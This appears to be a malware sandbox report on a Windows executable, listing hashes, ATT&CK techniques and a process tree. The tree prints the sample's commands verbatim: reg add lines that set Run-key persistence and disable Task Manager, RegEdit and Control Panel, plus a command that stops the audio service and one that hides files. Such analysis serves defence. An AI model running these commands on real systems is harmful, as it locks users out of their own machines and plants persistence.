e1d16bcd050157aa1d844f0f2ae4c7f02efb901e254b49b048e09699c04f77a1

Analysis

max time kernel
134s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 12:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe
Size

67KB
MD5

1b641712ef7337e80e9a1aca990fc815
SHA1

99df880d0924181314d80ea03f6dbea39e0e5cad
SHA256

e1d16bcd050157aa1d844f0f2ae4c7f02efb901e254b49b048e09699c04f77a1
SHA512

ffc96de0d6f229e01ede268bb2a76f4f581f0ea1a1a78588099419e3e7be4e8814872c2a867078eec9351b2828025ae23923301eca6d5321343ba7bebfec6618
SSDEEP

1536:gBejSRIZGra0WvKS3MKJ3j5kLaT5AfDWdI:JGIEhSKUZ3VHdAfSdI

Score

8^/10

evasion persistence

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\wincfg = "C:\\Windows\\inf\\wincfg.exe"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\inf\wincfg.exe	cmd.exe
File created	C:\Windows\inf\wincfg.exe	cmd.exe

Runs net.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 3276	4636	1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe	83
PID 4636 wrote to memory of 3276	4636	1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe	83
PID 4636 wrote to memory of 3276	4636	1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe	83
PID 3276 wrote to memory of 1852	3276	cmd.exe	85
PID 3276 wrote to memory of 1852	3276	cmd.exe	85
PID 3276 wrote to memory of 1852	3276	cmd.exe	85
PID 3276 wrote to memory of 4068	3276	cmd.exe	86
PID 3276 wrote to memory of 4068	3276	cmd.exe	86
PID 3276 wrote to memory of 4068	3276	cmd.exe	86
PID 3276 wrote to memory of 4952	3276	cmd.exe	87
PID 3276 wrote to memory of 4952	3276	cmd.exe	87
PID 3276 wrote to memory of 4952	3276	cmd.exe	87
PID 3276 wrote to memory of 2968	3276	cmd.exe	88
PID 3276 wrote to memory of 2968	3276	cmd.exe	88
PID 3276 wrote to memory of 2968	3276	cmd.exe	88
PID 3276 wrote to memory of 824	3276	cmd.exe	89
PID 3276 wrote to memory of 824	3276	cmd.exe	89
PID 3276 wrote to memory of 824	3276	cmd.exe	89
PID 3276 wrote to memory of 796	3276	cmd.exe	90
PID 3276 wrote to memory of 796	3276	cmd.exe	90
PID 3276 wrote to memory of 796	3276	cmd.exe	90
PID 3276 wrote to memory of 3272	3276	cmd.exe	91
PID 3276 wrote to memory of 3272	3276	cmd.exe	91
PID 3276 wrote to memory of 3272	3276	cmd.exe	91
PID 3276 wrote to memory of 3024	3276	cmd.exe	92
PID 3276 wrote to memory of 3024	3276	cmd.exe	92
PID 3276 wrote to memory of 3024	3276	cmd.exe	92
PID 3276 wrote to memory of 3784	3276	cmd.exe	93
PID 3276 wrote to memory of 3784	3276	cmd.exe	93
PID 3276 wrote to memory of 3784	3276	cmd.exe	93
PID 3276 wrote to memory of 4868	3276	cmd.exe	94
PID 3276 wrote to memory of 4868	3276	cmd.exe	94
PID 3276 wrote to memory of 4868	3276	cmd.exe	94
PID 3276 wrote to memory of 5004	3276	cmd.exe	95
PID 3276 wrote to memory of 5004	3276	cmd.exe	95
PID 3276 wrote to memory of 5004	3276	cmd.exe	95
PID 3276 wrote to memory of 4456	3276	cmd.exe	96
PID 3276 wrote to memory of 4456	3276	cmd.exe	96
PID 3276 wrote to memory of 4456	3276	cmd.exe	96
PID 3276 wrote to memory of 2964	3276	cmd.exe	97
PID 3276 wrote to memory of 2964	3276	cmd.exe	97
PID 3276 wrote to memory of 2964	3276	cmd.exe	97
PID 3276 wrote to memory of 4476	3276	cmd.exe	98
PID 3276 wrote to memory of 4476	3276	cmd.exe	98
PID 3276 wrote to memory of 4476	3276	cmd.exe	98
PID 4476 wrote to memory of 1032	4476	net.exe	99
PID 4476 wrote to memory of 1032	4476	net.exe	99
PID 4476 wrote to memory of 1032	4476	net.exe	99
PID 3276 wrote to memory of 2924	3276	cmd.exe	103
PID 3276 wrote to memory of 2924	3276	cmd.exe	103
PID 3276 wrote to memory of 2924	3276	cmd.exe	103

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2924	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\a73392.bat "C:\Users\Admin\AppData\Local\Temp\1b641712ef7337e80e9a1aca990fc815_JaffaCakes118.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v wincfg /t reg_sz /d C:\Windows\inf\wincfg.exe /f
    3⤵
    - Adds Run key to start application
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t reg_dword /d 00000001 /f
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoActiveDesktop /t reg_dword /d 00000001 /f
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewContextMenu /t reg_dword /d 00000001 /f
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t reg_dword /d 00000001 /f
    3⤵
    PID:824
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t reg_dword /d 00000001 /f
    3⤵
    PID:796
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d 00000001 /f
    3⤵
    PID:3272
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
    3⤵
    - Disables RegEdit via registry modification
    PID:3024
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispBackgroundPage /t reg_dword /d 00000001 /f
    3⤵
    PID:3784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispScrSavPage /t reg_dword /d 00000001 /f
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispSettingsPage /t reg_dword /d 00000001 /f
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t reg_dword /d 00000000 /f
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t reg_dword /d 00000000 /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\net.exe
    net stop "Windows Audio"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Windows Audio"
      4⤵
      PID:1032
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s *
    3⤵
    - Views/modifies file attributes
    PID:2924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a73392.bat

Filesize
1KB

MD5
df22fa149e2266df6f4c4f5f259b8f51

SHA1
0419b27fb477effd48327afab6d014028b872261

SHA256
54e4a1b939bacf0b7b1b9b93c5a21a966f855bdf152ce1e6d8eb8ed47739988c

SHA512
3bc1c1654e1aac78384d7862f4fc7c871d5ec4ab6ec0a7ba6459389f312dbf36fc6be6c07f3ae4d1a3bab8cb84d10bce547467a4610cd6831b0ab4e4bde202ab

Download Submit
memory/4636-5-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads